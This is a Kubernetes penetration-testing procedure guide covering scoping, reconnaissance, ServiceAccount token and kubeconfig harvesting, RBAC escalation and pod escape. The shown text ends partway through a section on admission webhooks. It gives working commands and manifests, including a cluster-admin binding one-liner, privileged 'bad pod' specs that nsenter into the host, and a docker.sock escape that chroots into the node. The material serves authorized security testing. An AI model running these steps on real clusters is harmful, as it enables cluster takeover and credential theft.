
Container & Kubernetes Pentesting SOP (Authorized)

Authorized environments only. Kubernetes pentesting touches three trust boundaries in one engagement: the cluster API plane (RBAC, service-account tokens, admission control), the workload-identity bridge (IRSA / GKE Workload Identity / AKS Pod Identity, which mints cloud-provider tokens), and the node host (a successful pod escape lands a process on a multi-tenant kernel). A single mis-scoped kubectl exec, RoleBinding write, or privileged: true pod rehearsal can cross all three. Authorization is per-cluster, per-namespace, and per-action-class (read-only enumeration, RBAC mutation, pod-escape detonation, workload-identity exercise) — get each in writing before any tool from §16 runs against an in-scope cluster.


Pre-Engagement & Authorization

A Kubernetes engagement is not a Linux engagement with kubectl bolted on. The blast-radius geometry is different: a single kubectl exec can run in any pod the SA has rights to; a single subjects[].name edit on a ClusterRoleBinding grants cluster-admin to an attacker-controlled identity cluster-wide, not host-wide; a single privileged: true pod with hostPath: / is root-on-every-worker. The legal surface is also distinct — workload identity bindings (IRSA / Workload Identity / Pod Identity) federate to the cloud-provider tenant, so exercising them reaches another tenant's IAM plane and may require its separate authorization (see Legal & Ethics for the canonical framework). CSP-bundled managed-k8s (EKS / AKS / GKE) has its own pentesting policy carve-outs that change per-CSP and per-year [verify 2026-04-27].

Authorization Checklist

  • Signed Rules of Engagement enumerates clusters by name + cloud-provider region + control-plane endpoint. "The Kubernetes environment" without a per-cluster list is too vague — collect cluster names, control-plane CA SHA-256 fingerprints, and the apiserver URL of every in-scope cluster.
  • Namespace scope is explicit. Most organizations multi-tenant by namespace; an unscoped engagement reaches every team's workload. Either name in-scope namespaces or document the cluster-wide rationale.
  • Action-class scope is explicit. Read-only kubectl get / describe / auth can-i is one bucket. RBAC mutation (kubectl create rolebinding, clusterrolebinding, apply -f), pod creation, kubectl exec, kubectl port-forward, kubectl debug --image, and kubectl proxy are each a different blast-radius class — name each in/out.
  • kubectl exec and kubectl debug --image scope. Exec into a pod runs commands as that pod's identity in that pod's namespace. kubectl debug --image injects an ephemeral container or copies a target pod with a debug image — both mutate cluster state and both can persist if the engagement window is exceeded. Default: out-of-scope; named-target exception only.
  • Pod-escape detonation scope. privileged: true, hostPID: true, hostNetwork: true, hostPath mounts to /, capability adds (SYS_ADMIN, SYS_PTRACE, SYS_MODULE), runc/containerd Leaky-Vessels-class CVE rehearsals (CVE-2024-21626 [verify 2026-04-27]) cross the pod→host boundary. Out-of-scope by default; per-CVE, per-cluster, per-node-pool authorization required.
  • Admission-controller-bypass scope. Bypassing Pod Security Standards restricted or admission policy (Gatekeeper / Kyverno / jsPolicy) to land an out-of-policy pod is itself a finding worth reporting; exercising the bypass for further escalation requires named authorization.
  • Workload-identity / cloud-bridge exercise scope. When an in-scope SA is bound to IRSA / GKE Workload Identity / AKS Pod Identity, exercising the binding mints a cloud-provider token and reaches the cloud-provider IAM plane — that traversal requires the cloud tenant's separate authorization (see Cloud Pentesting for the cloud-side authorization checklist).
  • etcd / control-plane direct access. Self-managed clusters expose etcd on TCP/2379. Self-hosted control planes may also expose unauthenticated kubelet on 10250 / read-only port 10255 (deprecated, removed 1.16+ [verify 2026-04-27]). Direct etcd access is full cluster admin via raw key-value reads — out of scope by default, named-target exception only.
  • Tenant boundary in shared clusters. Multi-tenant SaaS clusters (vCluster, kcp, namespace-as-a-service) and multi-team clusters share the apiserver. Tenant-A's pentest must not query Tenant-B's namespaces; kubectl auth can-i --namespace <other-tenant> itself is informational but listing or describing other-tenant Pods/Secrets is a scope violation.
  • Image registry scope. Registry credentials harvested from an in-scope cluster reach the registry's tenant — registry actions (image push, tag overwrite, repository delete) require the registry owner's authorization, which is often not the cluster owner.
  • CI/CD pipeline scope. ArgoCD / Flux / Tekton / Jenkins X access from inside the cluster lets a cluster-admin push to in-cluster Git mirrors and trigger pipelines. Pipeline-execution scope is separate from cluster-execution scope.
  • Blue-team coordination confirmed with whoever runs Falco / Tetragon / GuardDuty EKS Audit Log monitoring / Defender for Containers / GKE Security Posture, the SIEM, and the SOC bridge. Capture 24/7 contacts and emergency-stop signal — k8s-audit-driven detections fire at high rate during enumeration runs.
  • Recovery preconditions. GitOps reconciliation in place (ArgoCD / Flux) so any test mutation that escapes cleanup gets re-reconciled to declared state. If GitOps is not in place, the rollback runbook and a tested cluster-state backup (Velero / etcd snapshot) are prerequisites.
  • Per-CSP penetration-testing policy reviewed. AWS, Azure, and GCP each publish managed-k8s pentesting guidance separate from generic cloud pentesting policy [verify 2026-04-27]. Re-read at the start of each engagement; some primitives (control-plane DDoS, kube-apiserver-targeted scanning rate) remain prohibited regardless of customer authorization.

Lab Environment Requirements

  • Standalone lab cluster per engagement. Never rehearse RBAC mutation, pod-escape PoCs, or admission-controller-bypass primitives against the customer's cluster. kind, minikube, k3d, or a dedicated EKS/AKS/GKE cluster in the engagement operator's lab account is the minimum. Free-tier lab options exist for all three managed offerings [verify 2026-04-27].
  • Lab parity with target. Match the customer cluster's k8s minor version (kubectl version --output=json), CRI runtime (Docker shim — removed 1.24+, containerd, CRI-O), CNI (Cilium, Calico, Weave Net, AWS VPC CNI, Azure CNI, Cilium-EKS, GKE Dataplane V2), and admission-controller stack (PSA mode + namespace-pinned Pod Security Standards label, Gatekeeper / Kyverno policy bundle, validating-/mutating-webhook chain). Pod-escape primitives gated by capability set, runtime version, or kernel feature behave differently on near-miss configurations (see the fingerprint capture sketch after this list).
  • Container runtime version-matched for runc / containerd / CRI-O CVE rehearsals. Docker bundles runc; containerd bundles its own; CRI-O bundles its own — the patched-baseline triple at the time of the engagement is what to match. Leaky Vessels (CVE-2024-21626) baseline: runc ≥ 1.1.12, containerd ≥ 1.7.13, Docker Engine ≥ 25.0.2 [verify 2026-04-27].
  • PoC vetting workflow. Public k8s exploit code (KubeStriker, Bad Pods recipes, peirates payloads, runc-escape PoCs) on production is out-of-scope by default. Reproduce in the lab cluster, verify the primitive works, then narrate the equivalent finding from the target cluster's configuration without running the binary against production. Public PoCs have been backdoored — sha256sum and inspect before any execution.
  • Sacrificial cluster-admin kubeconfig. Engagement operator's daily-driver kubeconfig is not the credential used for testing; per-engagement service-account or kubeconfig minted at engagement start, scoped to in-scope clusters/namespaces, rotated at engagement close.
  • GTFOBins-style coverage spot-check. Before reporting a SA-token / RBAC verb / capability finding as exploitable, verify the primitive on Bad Pods (Bishop Fox) and HackTricks Kubernetes [verify 2026-04-27] — many baseline pod specs look exploitable but lack a documented escalation gadget under the cluster's specific Pod Security Standards / admission policy.
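
A minimal read-only fingerprint capture for lab parity, assuming only get rights on nodes, namespaces, and kube-system pods; the field paths are the standard nodeInfo / PSA-label locations:

# Parity triple: server version, CRI runtime(s), CNI pods, PSA posture
kubectl version --output=json | jq -r '.serverVersion.gitVersion'
kubectl get nodes -o jsonpath='{range .items[*]}{.status.nodeInfo.containerRuntimeVersion}{"\n"}{end}' | sort -u
kubectl get pods -n kube-system -o name | grep -E 'cilium|calico|weave|aws-node|azure|kindnet' | sort -u
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}'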

Disclosure-Ready Posture

Stand up the evidence pipeline before the first kubectl auth can-i --list call, not after the report deadline. The k8s-specific evidence surface is wider than classic Linux pentesting: every command leaves an apiserver audit-log entry, every pod creation leaves a node-runtime trace, every ServiceAccount token use leaves a cloud-provider audit trail (when bound to IRSA / Workload Identity / Pod Identity).

  • Capture every kubectl call. kubectl --v=8 logs the full HTTP request/response exchange with the apiserver; a recording proxy behind kubectl proxy captures the same. Archive the apiserver audit-event ID for each test action so the customer can correlate via their audit-log destination (CloudWatch Logs for EKS, Log Analytics for AKS, Cloud Logging for GKE). A wrapper sketch follows this list.
  • RBAC dump baseline at engagement start. kubectl get clusterrole,clusterrolebinding,role,rolebinding -A -o yaml > rbac.baseline.yaml plus kubectl get sa -A -o yaml > sa.baseline.yaml. Any RBAC change made during testing is the diff against this baseline.
  • Audit-policy snapshot. kubectl get --raw /api/v1/namespaces/kube-system/configmaps/audit-policy 2>/dev/null (where readable) or vendor-managed audit policy reference. Records what the cluster was logging when you tested — critical when the customer later reviews coverage gaps.
  • Cluster version + CRI + CNI + admission-controller fingerprint. kubectl version --output=json, kubectl get nodes -o wide (CRI runtime in STATUS), kubectl get pods -n kube-system -l <CNI-label>, kubectl get validatingwebhookconfigurations,mutatingwebhookconfigurations -A — the fingerprint at the time of the test, frozen with the report.
  • Token & kubeconfig hygiene. Service-account tokens harvested during testing (especially long-lived legacy SA tokens — pre-1.24 default — and IRSA / Workload-Identity-bound projected tokens) hold replayable cluster identity. Encrypt-at-rest, scope retention to the report-delivery window, log who accessed them, schedule destruction in the engagement letter — discipline per OPSEC.
  • Evidence pack + final report routing. Stage evidence per the Collection Log hash-and-timestamp pattern referenced in §14 below; final disclosure pack follows Reporting & Disclosure. Defang any IOC that ships in the final write-up (redact cluster names, account IDs, namespace names to the minimum needed for the customer to identify the affected resources).
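
A minimal capture-wrapper sketch, assuming a bash jump host and a per-engagement $EVIDENCE directory (wrapper name and paths hypothetical); it timestamps each call, keeps the --v=8 transcript, and hashes it on the spot:

#!/usr/bin/env bash
# kubectl-ev: run kubectl with HTTP-level logging, archiving transcript + index entry
EVIDENCE="${EVIDENCE:-$HOME/evidence/k8s}"   # assumed evidence root
mkdir -p "$EVIDENCE"
ts=$(date -u +%Y%m%dT%H%M%SZ)
log="$EVIDENCE/${ts}_kubectl.log"
echo "[$ts] kubectl $*" >> "$EVIDENCE/command_index.txt"
kubectl --v=8 "$@" 2>"$log"                  # verbose request/response goes to stderr
sha256sum "$log" >> "$EVIDENCE/evidence_hashes.txt"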

1. Engagement Setup

Pre-Engagement

  • Define scope: clusters (by name + endpoint + cloud-provider region), namespaces, action classes (read-only / RBAC-mutate / pod-escape / WI-exercise), in/out CRDs (Operators publish their own CRDs — some are sensitive)
  • Obtain written authorization (RoE) per the checklist above
  • Identify CSP support plan and managed-k8s pentesting policy carve-outs
  • Establish testing windows and emergency-stop signal
  • Set up logged-shell jump host with kubectl, kubectl-cnpg, kubectl-krew, helm, evidence bucket, NTP-synced clock
  • Confirm cost ceiling — peirates / kube-hunter / kubeaudit at default verbosity generate apiserver request volume that can hit etcd-call-rate limits on shared control planes

Objectives (Examples)

  • Identify cluster-admin paths from a low-privilege ServiceAccount or compromised pod
  • Discover pods escapable to host (privileged, hostPath /, hostPID, dangerous capabilities)
  • Test admission-controller coverage (Pod Security Standards, Gatekeeper, Kyverno) for bypass
  • Validate workload-identity boundary (IRSA / GKE WI / AKS Pod Identity) — does a compromised pod's SA reach more cloud-provider IAM than the workload requires?
  • Test detection coverage (apiserver audit → SIEM, Falco / Tetragon, GuardDuty EKS Audit Log, Defender for Containers)
  • Identify supply-chain exposure (registry credentials in cluster, signed-image enforcement, ArgoCD/Flux pipeline access)
  • Validate compliance posture (CIS Kubernetes Benchmark, NSA/CISA Kubernetes Hardening Guide, Pod Security Standards)

2. Cluster Reconnaissance

The recon goal is fingerprint, not enumeration: the apiserver tells you everything if you have a token, but the cluster's shape (version, CNI, CRI, admission stack, audit posture) determines which downstream primitives are feasible.

Cluster fingerprint (authenticated)

# Apiserver + control-plane fingerprint
kubectl version --output=json # client + server version
kubectl cluster-info # apiserver URL, KubeDNS / CoreDNS
kubectl cluster-info dump --output-directory ./recon # broad, noisy — use with caution
kubectl api-resources # full resource list (incl. CRDs)
kubectl api-versions # API group versions exposed
kubectl get --raw /version | jq # raw server-version handshake
kubectl get --raw /metrics 2>/dev/null | head # apiserver Prometheus metrics (often unauth on self-hosted)

# Node + runtime fingerprint
kubectl get nodes -o wide # OS image, kernel, CRI runtime
kubectl get nodes -o jsonpath='{.items[*].status.nodeInfo}' | jq
# Look for: kubeletVersion, containerRuntimeVersion (containerd://1.7.x, docker://20.10.x), kernelVersion

# Namespace inventory
kubectl get namespaces
kubectl get namespaces -o jsonpath='{.items[*].metadata.labels}' # PSA labels: pod-security.kubernetes.io/{enforce,audit,warn}={privileged,baseline,restricted}

# CNI fingerprint
kubectl get pods -n kube-system -o wide
# Look for: cilium-*, calico-node-*, weave-net-*, aws-node-* (VPC CNI), azure-cni-*, kindnet-*

# Admission stack
kubectl get validatingwebhookconfigurations -o name
kubectl get mutatingwebhookconfigurations -o name
kubectl get validatingadmissionpolicies,validatingadmissionpolicybindings 2>/dev/null # 1.30+ GA [verify 2026-04-27]
kubectl get crd | grep -iE "gatekeeper|opa|kyverno|jspolicy|kubewarden"

Cluster fingerprint (unauthenticated / external)

# Apiserver TLS fingerprint (no credentials)
echo | openssl s_client -connect <apiserver>:6443 -showcerts 2>/dev/null | openssl x509 -noout -text | grep -E "Subject:|DNS:|Not (Before|After)"

# Anonymous-auth check (pre-1.24 default; explicitly disabled in most managed offerings — verify per cluster)
curl -sk https://<apiserver>:6443/version
curl -sk https://<apiserver>:6443/api/v1/namespaces/default/pods
# 401 = anonymous disabled (expected). 200 with a pod list = anonymous-auth enabled = critical.

# Discoverable endpoints on common ports
# 6443 — apiserver TLS (managed offerings)
# 8443 — apiserver TLS (self-hosted alt)
# 10250 — kubelet TLS (per-node)
# 10255 — kubelet read-only HTTP (deprecated, removed 1.16+) [verify 2026-04-27]
# 2379-2380 — etcd (self-hosted only; managed offerings hide etcd)
# 4194 — cAdvisor (deprecated)

# kube-hunter — passive / active discovery
# https://github.com/aquasecurity/kube-hunter
kube-hunter --remote <apiserver-cidr-or-ip>
kube-hunter --cidr <network> --active # active mode — destructive; lab only

Pod-internal recon (post-compromise: shell on a pod)

# "Am I in a Kubernetes pod?"
ls /var/run/secrets/kubernetes.io/serviceaccount/ # SA token, ca.crt, namespace
env | grep -E "KUBERNETES_(SERVICE|PORT)" # apiserver Service env vars
cat /etc/resolv.conf # search domain: <ns>.svc.cluster.local

# Pod identity
SA=/var/run/secrets/kubernetes.io/serviceaccount
cat $SA/namespace
cat $SA/ca.crt | openssl x509 -noout -subject -issuer
TOKEN=$(cat $SA/token)
curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/api/v1/namespaces/$(cat $SA/namespace)/pods | jq

# Host indicators leaking through pod
mount | grep -E "overlay|kubelet|var/lib/kubelet"
cat /proc/1/cgroup | grep -E "kubepods|containerd|crio"
ls -la /sys/fs/cgroup/ # cgroup v1 vs v2 (host kernel feature)

T1613 (Container and Resource Discovery), T1526 (Cloud Service Discovery — when WI binding traverses to cloud).


3. Authentication & Identity

Kubernetes authenticates to the apiserver via one of: client certificates (most self-hosted clusters), bearer tokens (ServiceAccount projected tokens, OIDC ID tokens), basic auth (deprecated, removed 1.19+ [verify 2026-04-27]), or webhook token authentication (cloud-provider IAM federations: AWS IAM Authenticator → EKS, Azure AD → AKS, GCP IAM → GKE).

ServiceAccount tokens

# Pre-1.24 default: long-lived JWT in /var/run/secrets/kubernetes.io/serviceaccount/token
# 1.24+ default: BoundServiceAccountTokenVolume — projected, time-bound (1h default), audience-scoped
# https://kubernetes.io/docs/concepts/security/service-accounts/#bound-service-account-tokens

# Decode the JWT to inspect claims
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | jq
# Look for: iss (apiserver URL), aud (audience — sts.amazonaws.com / api / specific webhook),
# exp (expiry), kubernetes.io.serviceaccount.name, kubernetes.io.serviceaccount.uid

# Mint a fresh token for a target SA (caller must have create on serviceaccounts/token sub-resource)
kubectl create token <sa-name> -n <namespace> --duration=1h
kubectl create token <sa-name> -n <namespace> --audience=sts.amazonaws.com # IRSA-bound

# Legacy long-lived SA secrets (Secret of type kubernetes.io/service-account-token)
kubectl get secrets -n <ns> --field-selector=type=kubernetes.io/service-account-token
kubectl get secret <secret-name> -n <ns> -o jsonpath='{.data.token}' | base64 -d

T1552.007 (Container API), T1528 (Steal Application Access Token).

kubeconfig analysis

# Find loose kubeconfigs (post-host-compromise)
find / -name "config" -path "*/.kube/*" 2>/dev/null
find / -name "kubeconfig*" 2>/dev/null

# Inspect contexts, users, exec credentials
kubectl config view --raw # includes embedded creds
kubectl config get-contexts
kubectl config view --raw -o jsonpath='{.users[*].user.exec}' | jq
# exec.command often invokes aws-iam-authenticator, gke-gcloud-auth-plugin, kubelogin, etc.
# Embedded client certs / tokens are rotation-fragile but often missed in IR

OIDC / cloud IAM federation

# EKS — IAM authenticator (mapping IAM principals to k8s users via aws-auth ConfigMap)
kubectl get cm aws-auth -n kube-system -o yaml # critical — controls who is cluster-admin
# IRSA — IAM Roles for Service Accounts; SA annotation eks.amazonaws.com/role-arn binds the SA
kubectl get sa -A -o jsonpath='{range .items[?(@.metadata.annotations.eks\.amazonaws\.com/role-arn)]}{.metadata.namespace}/{.metadata.name} → {.metadata.annotations.eks\.amazonaws\.com/role-arn}{"\n"}{end}'

# AKS — Azure AD integration; pod-managed identity / Workload Identity (WI replaces aad-pod-identity, deprecated)
kubectl get sa -A -o jsonpath='{range .items[?(@.metadata.annotations.azure\.workload\.identity/client-id)]}{.metadata.namespace}/{.metadata.name} → {.metadata.annotations.azure\.workload\.identity/client-id}{"\n"}{end}'

# GKE — Google IAM federation; Workload Identity binds k8s SA to GCP SA
kubectl get sa -A -o jsonpath='{range .items[?(@.metadata.annotations.iam\.gke\.io/gcp-service-account)]}{.metadata.namespace}/{.metadata.name} → {.metadata.annotations.iam\.gke\.io/gcp-service-account}{"\n"}{end}'

§7 covers the exercise of the workload-identity binding (mint a cloud token from a compromised pod). This section enumerates only.


4. RBAC Enumeration & Abuse

RBAC is the cluster's authorization plane. The apiserver answers "may principal P do verb V on resource R in namespace N?" against the union of bound (Cluster)Roles. Most exploitable misconfigurations live here.

kubectl auth can-i mining

# Full permission matrix for current credential
kubectl auth can-i --list # current namespace
kubectl auth can-i --list --all-namespaces # cluster-scope view (1.27+ for namespace=*) [verify 2026-04-27]
kubectl auth can-i --list --as=system:anonymous # anonymous-auth surface
kubectl auth can-i --list --as=system:serviceaccount:<ns>:<sa> # impersonation check (requires impersonate verb)

# Specific verbs that lead to escalation
kubectl auth can-i create pods --all-namespaces
kubectl auth can-i create pods/exec --all-namespaces
kubectl auth can-i create pods/portforward --all-namespaces
kubectl auth can-i create clusterrolebindings
kubectl auth can-i patch nodes
kubectl auth can-i create token --subresource=token serviceaccounts/<target-sa>
kubectl auth can-i impersonate users
kubectl auth can-i '*' '*' --all-namespaces # cluster-admin? (literal '*' — quote against shell glob)

RBAC graph dump

# Full RBAC surface — start with a baseline before any mutation
kubectl get clusterroles -o yaml > clusterroles.baseline.yaml
kubectl get clusterrolebindings -o yaml > clusterrolebindings.baseline.yaml
kubectl get roles -A -o yaml > roles.baseline.yaml
kubectl get rolebindings -A -o yaml > rolebindings.baseline.yaml
kubectl get sa -A -o yaml > sa.baseline.yaml

# KubiScan — RBAC risk scanner (Cyberark)
# https://github.com/cyberark/KubiScan
kubiscan --risky-roles
kubiscan --risky-subjects
kubiscan --risky-pods

# rbac-tool (Insight Engineering) — RBAC analysis + visualization
# https://github.com/alcideio/rbac-tool
rbac-tool who-can create clusterrolebindings
rbac-tool who-can '*' '*'
rbac-tool viz --cluster-context <ctx> # generate dot graph

# rbac-lookup (FairwindsOps)
# https://github.com/FairwindsOps/rbac-lookup
rbac-lookup <name> --output wide
rbac-lookup --kind serviceaccount

# Stale ClusterRoleBindings to default SAs
kubectl get clusterrolebindings -o jsonpath='{range .items[?(@.subjects[*].kind=="ServiceAccount")]}{.metadata.name}: {range .subjects[*]}{.namespace}/{.name} {end}{"\n"}{end}'

Canonical RBAC escalation primitives

The most-cited RBAC privilege-escalation path catalog is Bishop Fox's "Bad Pods" + Mark Manning / Brad Geesaman's k8s-attack-research. Categories that actually escalate (verify each against the cluster's admission policy):

  • create pods/exec on a high-privileged pod's namespace — exec into a pod whose SA has more rights, then act as that SA. Often holds for pods running ArgoCD, Flux, Tekton, monitoring exporters, GitOps controllers, ingress controllers.
  • create pods + create serviceaccounts/token (or pre-existing privileged SA available to bind) — schedule a new pod that mounts a privileged SA token, exec into it.
  • patch pods/ephemeralcontainers (1.25+ GA [verify 2026-04-27]) — inject a debug container into a target pod without needing exec; the container shares the pod's SA token and namespace.
  • create pods with serviceAccountName: <privileged-SA-in-same-namespace> — escalate to any SA in the same namespace, not just your own.
  • escalate verb on roles/clusterroles (rbac.authorization.k8s.io/v1) — bypasses the rule that forbids creating a Role with permissions you don't have. With escalate you can create a Role/CR that grants anything, then bind it to yourself.
  • bind verb on roles/clusterroles — bind an existing high-privilege Role/CR to yourself or a controlled SA without needing the underlying permissions.
  • create rolebindings / create clusterrolebindings without bind — most common; if you can bind any existing cluster-admin-equivalent ClusterRole (cluster-admin, system:masters, edit, admin) to yourself or your SA, you escalate (lab demo after the quick-check loop below).
  • update on configmaps in kube-system (EKS aws-auth) — kubectl edit cm aws-auth -n kube-system lets the attacker map any AWS IAM principal to system:masters (cluster-admin equivalent on EKS) [verify 2026-04-27].
  • patch nodes — node lease takeover; can poison node labels / taints to attract privileged workloads to a controlled node.
  • get secrets cluster-wide — read every Secret, including SA tokens (legacy long-lived) and cloud-provider credentials baked in (KMS keys are sometimes referenced by ARN/URI in Secret annotations even when the keymat itself is not in the Secret).
  • impersonate users / groups / serviceaccounts — direct apiserver impersonation (verb impersonate) lets the attacker act as any principal; cluster-admin-equivalent.
# Quick check of the escalation surface from current credential
for verb in 'create pods/exec' 'create clusterrolebindings' 'escalate clusterroles' 'bind clusterroles' \
            'create pods/ephemeralcontainers' 'impersonate users' 'patch nodes' 'get secrets'; do
  res=$(kubectl auth can-i $verb --all-namespaces 2>/dev/null)   # unquoted $verb: intentional word split
  echo "$verb → $res"
done
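
Where create clusterrolebindings comes back yes, the escalation itself is a one-liner. A lab-only sketch (SA and binding names hypothetical), with immediate cleanup so the mutation never outlives the test window:

# LAB ONLY — RBAC mutation requires written per-cluster authorization in production
kubectl create clusterrolebinding pentest-escalate-demo \
  --clusterrole=cluster-admin \
  --serviceaccount=default:attacker-sa
kubectl auth can-i '*' '*' --as=system:serviceaccount:default:attacker-sa   # expect: yes
kubectl delete clusterrolebinding pentest-escalate-demo   # cleanup; verify with diff vs rbac baseline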

T1098.006 (Account Manipulation: Additional Container Cluster Roles), T1078.004 (Valid Accounts: Cloud Accounts).

Default-SA over-permission

Every namespace has a default ServiceAccount. Any pod that does not specify serviceAccountName: mounts the default SA's token. If the default SA has cluster-admin (a frequent legacy holdover from Helm charts that bound cluster-admin to default), every pod in that namespace is cluster-admin.

# Find ClusterRoleBindings that grant non-trivial roles to default SAs
kubectl get clusterrolebindings -o json \
| jq '.items[] | select(.subjects[]? | select(.kind=="ServiceAccount" and .name=="default")) | {name: .metadata.name, role: .roleRef.name, subjects: .subjects}'

# Per-namespace default-SA token review
for ns in $(kubectl get ns -o jsonpath='{.items[*].metadata.name}'); do
  rights=$(kubectl auth can-i --list --as=system:serviceaccount:$ns:default 2>/dev/null | grep -cE 'create|delete|update|patch|\*')
  [ "$rights" -gt 5 ] && echo "$ns: default SA has $rights mutating verbs"
done

5. Pod Escape Primitives

Pod-escape primitives cross the pod→host boundary. They are the Kubernetes equivalent of kernel LPE: a successful escape lands a process on the worker node, then on every other workload colocated on that node. Most modern managed offerings (EKS, AKS, GKE) ship with sensible defaults (Pod Security Standards baseline or restricted on system namespaces, runc patched against Leaky Vessels, AppArmor / seccomp profiles), but customer-namespaces often relax the constraints.

Detonation discipline. Each primitive in this section assumes the customer's RoE explicitly authorizes pod-escape detonation against a named cluster + node pool. Default behavior is to demonstrate the configuration that would allow escape (a pod manifest, a capability set, a RBAC grant) and stop. Detonation requires named per-primitive authorization.

Privileged pod / hostPID / hostNetwork / hostPath

The classic escape path. Eight canonical "bad pod" recipes from Bishop Fox map combinations of these flags to escape primitives [verify 2026-04-27].

# Recipe 1: privileged: true + hostPID → root on host via nsenter into host PID 1
apiVersion: v1
kind: Pod
metadata: { name: bad-pod-1, namespace: <ns> }
spec:
  hostPID: true
  containers:
  - name: bp
    image: alpine
    securityContext: { privileged: true }
    command: ["nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash"]

# Recipe 2: hostPath: / → read every file on the node (kubeconfig, etcd certs, kubelet creds)
apiVersion: v1
kind: Pod
metadata: { name: bad-pod-2 }
spec:
  containers:
  - name: bp
    image: alpine
    volumeMounts: [{ name: host, mountPath: /host }]
  volumes: [{ name: host, hostPath: { path: / } }]

# Find existing pods with escape-class flags (no detonation — enumeration)
kubectl get pods -A -o json | jq -r '.items[]
| select(.spec.hostPID==true or .spec.hostNetwork==true or .spec.hostIPC==true
or (.spec.containers[]?.securityContext.privileged==true)
or (.spec.volumes[]?.hostPath != null))
| "\(.metadata.namespace)/\(.metadata.name): " +
"hostPID=\(.spec.hostPID // false) hostNet=\(.spec.hostNetwork // false) " +
"priv=\([.spec.containers[]?.securityContext.privileged] | tostring)"'

# Find existing pods with hostPath mounts to sensitive paths
kubectl get pods -A -o json | jq -r '.items[] | select(.spec.volumes[]?.hostPath.path | tostring | test("^(/|/etc|/var/run/docker.sock|/var/lib/kubelet|/proc|/sys)$"))'

Capabilities

Linux capabilities held by the container process. CAP_SYS_ADMIN + writable cgroup v1 = release_agent escape (CVE-2022-0492 [verify 2026-04-27]); CAP_SYS_PTRACE + hostPID = attach to host PID 1; CAP_SYS_MODULE = load kernel modules; CAP_NET_ADMIN + hostNetwork = manipulate host network stack.

# Find pods with dangerous capability adds
kubectl get pods -A -o json | jq -r '.items[] | .metadata as $m | .spec.containers[]? | select(.securityContext.capabilities.add != null) | {pod: "\($m.namespace)/\($m.name)", container: .name, adds: .securityContext.capabilities.add}'

# In-pod capability check (post-compromise)
capsh --print | grep -E "cap_sys_(admin|ptrace|module)|cap_dac_(read_search|override)|cap_net_(admin|raw)"
grep ^Cap /proc/self/status
capsh --decode=$(awk '/^CapEff/{print $2}' /proc/self/status)

Mounted Docker / containerd / CRI-O socket

A pod with /var/run/docker.sock, /run/containerd/containerd.sock, or /var/run/crio/crio.sock mounted has direct control of the node's container runtime. Equivalent to root-on-host: launch a new container with --privileged + host root mounted.

# Find pods mounting runtime sockets
kubectl get pods -A -o json | jq -r '.items[] | .metadata as $m | .spec.volumes[]? | select(.hostPath.path // "" | test("docker.sock|containerd.sock|crio.sock|podman.sock")) | "\($m.namespace)/\($m.name): \(.hostPath.path)"'

# Inside a pod with docker.sock — confirm
ls -la /var/run/docker.sock
docker -H unix:///var/run/docker.sock ps
docker -H unix:///var/run/docker.sock run --rm --privileged -v /:/host alpine chroot /host /bin/bash

Container-runtime CVE rehearsals

Lab-only. Each primitive below has crashed clusters in the wild during pentests. Match runtime version exactly in the lab before reporting feasibility against production from configuration alone.

| CVE | Component | Trigger | Quick check |
| --- | --- | --- | --- |
| CVE-2024-21626 (Leaky Vessels) | runc ≤ 1.1.11 | FD leak through /proc/self/fd to host filesystem | runc --version on node; docker info --format '{{.RuncVersion}}' |
| CVE-2022-0492 | Linux kernel cgroup v1 | release_agent write from CAP_SYS_ADMIN-holding container | unprivileged user namespace + cgroup v1 on host kernel |
| CVE-2022-0185 | Linux kernel fs_context | Heap overflow exploitable in containers with CAP_SYS_ADMIN | uname -r ≤ 5.16.x [verify 2026-04-27] |
| CVE-2019-5736 | runc ≤ 1.0-rc6 | Overwrite host's runc binary via /proc/self/exe | Legacy clusters only |
| CVE-2022-23648 | containerd OCI image-spec | Symlink traversal during image extraction | containerd ≤ 1.6.1 |
| CVE-2024-0132 | NVIDIA Container Toolkit ≤ 1.16.1 | TOCTOU mount-handling escape | NVIDIA-GPU clusters only [verify 2026-04-27] |

[verify 2026-04-27] Patched-baseline versions drift; cross-check vendor advisories at engagement start.

T1611 (Escape to Host).


6. Admission-Controller Bypass

Admission controllers gate every write to the apiserver. They are the cluster's last line of defense before pods land on nodes. Three classes:

  • Built-in admission plugins — Pod Security Standards (PSS, replaces deprecated PodSecurityPolicy [verify 2026-04-27]), NodeRestriction, ResourceQuota, LimitRanger, AlwaysPullImages, ImagePolicyWebhook.
  • Custom admission webhooks — Validating (reject-only) and Mutating (rewrite) webhook chains. OPA Gatekeeper, Kyverno, jsPolicy, Kubewarden are the dominant policy engines; vendor-specific webhooks (Istio sidecar injection, Linkerd injection, cert-manager injection) frequently exist.
  • ValidatingAdmissionPolicy (CEL-based, GA in 1.30 [verify 2026-04-27]) — in-tree alternative to validating webhooks, no external service required.

Pod Security Standards (PSS)

# Per-namespace PSS labels (enforce | audit | warn at privileged | baseline | restricted)
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/audit}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/warn}{"\n"}{end}'

# Bypass surfaces:
# 1. Namespace has no PSS label → defaults to "privileged" (no restrictions)
# 2. PSS "warn" or "audit" without "enforce" → logs but does not block
# 3. PSA admission plugin disabled in apiserver config (self-hosted only)
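
A non-destructive enforcement probe, assuming create pods rights in the target namespace: server-side dry-run runs the admission chain without persisting the pod, so an enforce label rejects, a warn-only label returns a warning, and an unlabeled namespace accepts silently.

# Probe PSS enforcement with a privileged pod spec (never persisted)
kubectl apply --dry-run=server -n <target-ns> -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata: { name: pss-probe }
spec:
  containers:
  - name: probe
    image: alpine
    securityContext: { privileged: true }
EOF
# enforce=baseline/restricted → "violates PodSecurity" error; warn → Warning: header; no label → created (dry run)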

Webhook ordering & failurePolicy

The apiserver invokes mutating webhooks sequentially (ordered by configuration name) and validating webhooks in parallel. Each webhook has a failurePolicy (Ignore or Fail) and timeoutSeconds. A webhook with failurePolicy: Ignore that times out is effectively bypassed.

# Webhook configurations (look for failurePolicy: Ignore on security-critical webhooks)
